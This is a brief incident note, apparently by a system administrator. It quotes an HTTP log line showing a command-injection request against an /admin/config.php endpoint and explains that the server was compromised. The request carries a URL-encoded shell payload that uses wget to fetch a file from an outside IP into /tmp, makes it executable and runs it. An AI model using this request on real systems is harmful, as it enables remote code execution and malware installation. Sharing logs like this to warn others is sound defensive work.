Found in http logs:
“GET /admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20sup;wget%20http%3A%2F%2F162.213.24.40%2Fbesh%20-O%20%2Ftmp%2Ftoplel%3B%20chmod%20777%20%2Ftmp%2Ftoplel%3B%20%2Ftmp%2Ftoplel%3B HTTP/1.1” 200 345 “-” “Python-urllib/2.7”
This download a script file in /tmp/
toplel is a script that downloads another program, chmod 777 it and run!
System Hacked!
Francesco TheCalle Callegaro